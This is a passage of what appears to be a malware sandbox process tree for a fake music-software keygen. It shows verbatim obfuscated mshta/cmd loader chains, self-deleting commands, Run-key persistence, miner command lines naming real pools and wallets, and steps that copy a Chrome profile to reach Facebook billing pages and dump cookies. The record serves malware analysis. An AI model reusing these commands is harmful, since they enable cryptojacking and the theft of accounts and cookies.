                                                                                                                                  1⤵
                                                                                                                                    PID:68
                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:4868
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:5316
                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:5680
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp2_Phatnoise.Music.Manager.all.ve.serial.keys.gen.zip\Phatnoise.Music.Manager.all.ve.serial.keys.gen.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp2_Phatnoise.Music.Manager.all.ve.serial.keys.gen.zip\Phatnoise.Music.Manager.all.ve.serial.keys.gen.exe"
                                                                                                                                      1⤵
                                                                                                                                        PID:5884
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                          2⤵
                                                                                                                                            PID:5984
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                              keygen-pr.exe -p83fsase3Ge
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:6036
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:5008
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                  5⤵
                                                                                                                                                    PID:4560
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                keygen-step-1.exe
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:6056
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                                keygen-step-5.exe
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:6064
                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbscriPt: CLoSe ( CrEatEObjeCT("WsCrIPt.Shell" ). Run( "cMD.exe /C TyPe ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if """"== """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -IM ""%~NxJ"" -F > NuL " ,0 ))
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4876
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C TyPe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" >Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if ""== "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -IM "%~NxJ" -F > NuL
                                                                                                                                                      5⤵
                                                                                                                                                        PID:1568
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Ehmj.exe
                                                                                                                                                          Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:2072
                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                            "C:\Windows\System32\mshta.exe" VbscriPt: CLoSe ( CrEatEObjeCT("WsCrIPt.Shell" ). Run( "cMD.exe /C TyPe ""C:\Users\Admin\AppData\Local\Temp\Ehmj.exe"" > Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if ""-P85DVJ_N_WA39dHAGmL0E~ ""== """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\Ehmj.exe"" ) do taskkill -IM ""%~NxJ"" -F > NuL " ,0 ))
                                                                                                                                                            7⤵
                                                                                                                                                              PID:5412
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C TyPe "C:\Users\Admin\AppData\Local\Temp\Ehmj.exe" >Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if "-P85DVJ_N_WA39dHAGmL0E~ "== "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\Ehmj.exe" ) do taskkill -IM "%~NxJ" -F > NuL
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:1008
                                                                                                                                                              • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                "C:\Windows\System32\regsvr32.exe" /U -s .\YFDBQ.T
                                                                                                                                                                7⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                PID:5556
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill -IM "keygen-step-5.exe" -F
                                                                                                                                                              6⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:2332
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                        keygen-step-2.exe
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                        PID:6088
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\DCD4.tmp.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\DCD4.tmp.exe"
                                                                                                                                                          4⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:5532
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\DCD4.tmp.exe"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:2372
                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                timeout /T 10 /NOBREAK
                                                                                                                                                                6⤵
                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                PID:1344
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5620
                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                ping 127.0.0.1
                                                                                                                                                                5⤵
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:5584
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                            keygen-step-3.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:3028
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5360
                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                  ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                  PID:5488
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                              keygen-step-4.exe
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:5132
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\asdw.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\asdw.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:2372
                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:2968
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                PID:3632
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\E502.tmp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\E502.tmp.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:3052
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\E502.tmp.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\E502.tmp.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:5748
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\E706.tmp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\E706.tmp.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:4892
                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                    -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w3719 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                    PID:3868
                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                    -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w5189@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:4500
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:5824
                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        ping 127.0.0.1
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                        PID:6032
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Drops Chrome extension
                                                                                                                                                                    PID:1280
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:3196
                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                          taskkill /f /im chrome.exe
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          PID:1100
                                                                                                                                                                      • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                        xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                        PID:5372
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                        PID:1656
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffda5bf4f50,0x7ffda5bf4f60,0x7ffda5bf4f70
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:4556
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,9056904841321425825,13101869208466442043,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1688 /prefetch:8
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            PID:364
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1604,9056904841321425825,13101869208466442043,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1632 /prefetch:2
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:3484
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1604,9056904841321425825,13101869208466442043,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2316 /prefetch:8
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:5156
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,9056904841321425825,13101869208466442043,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2824 /prefetch:1
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:4856
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,9056904841321425825,13101869208466442043,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:1
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:3268
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,9056904841321425825,13101869208466442043,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:6084
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,9056904841321425825,13101869208466442043,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:2872
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,9056904841321425825,13101869208466442043,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:1
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:5024
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,9056904841321425825,13101869208466442043,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:6108
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md4_4igk.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md4_4igk.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                        PID:4632
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:3676
                                                                                                                                                                                        • C:\ProgramData\6536023.exe
                                                                                                                                                                                          "C:\ProgramData\6536023.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:4728
                                                                                                                                                                                        • C:\ProgramData\1761018.exe
                                                                                                                                                                                          "C:\ProgramData\1761018.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                          PID:5824
                                                                                                                                                                                          • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                            "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:5808
                                                                                                                                                                                        • C:\ProgramData\926117.exe
                                                                                                                                                                                          "C:\ProgramData\926117.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                          PID:6140
                                                                                                                                                                                          • C:\ProgramData\926117.exe
                                                                                                                                                                                            "{path}"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:2072
                                                                                                                                                                                        • C:\ProgramData\771310.exe
                                                                                                                                                                                          "C:\ProgramData\771310.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:5280
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                        PID:5868
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:1796
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:1984
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:4244
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:1968
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp2_Phatnoise.Music.Manager.all.ve.serial.keys.gen.zip\Phatnoise.Music.Manager.all.ve.serial.keys.gen.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Temp2_Phatnoise.Music.Manager.all.ve.serial.keys.gen.zip\Phatnoise.Music.Manager.all.ve.serial.keys.gen.exe"
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:4652
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen.bat" "
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:5320
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-pr.exe
                                                                                                                                                                                          keygen-pr.exe -p83fsase3Ge
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:1808
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:2856
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:3588
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-1.exe
                                                                                                                                                                                            keygen-step-1.exe
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:4620
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-5.exe
                                                                                                                                                                                            keygen-step-5.exe
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:3324
                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" VbscriPt: CLoSe ( CrEatEObjeCT("WsCrIPt.Shell" ). Run( "cMD.exe /C TyPe ""C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-5.exe"" > Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if """"== """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-5.exe"" ) do taskkill -IM ""%~NxJ"" -F > NuL " ,0 ))
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:5532
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C TyPe "C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-5.exe" >Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if ""== "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-5.exe" ) do taskkill -IM "%~NxJ" -F > NuL
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:4484
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Ehmj.exe
                                                                                                                                                                                                      Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:5188
                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbscriPt: CLoSe ( CrEatEObjeCT("WsCrIPt.Shell" ). Run( "cMD.exe /C TyPe ""C:\Users\Admin\AppData\Local\Temp\Ehmj.exe"" > Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if ""-P85DVJ_N_WA39dHAGmL0E~ ""== """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\Ehmj.exe"" ) do taskkill -IM ""%~NxJ"" -F > NuL " ,0 ))
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                          PID:5512
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C TyPe "C:\Users\Admin\AppData\Local\Temp\Ehmj.exe" >Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if "-P85DVJ_N_WA39dHAGmL0E~ "== "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\Ehmj.exe" ) do taskkill -IM "%~NxJ" -F > NuL
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:4972
                                                                                                                                                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                            "C:\Windows\System32\regsvr32.exe" /U -s .\YFDBQ.T
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                            • Loads dropped DLL
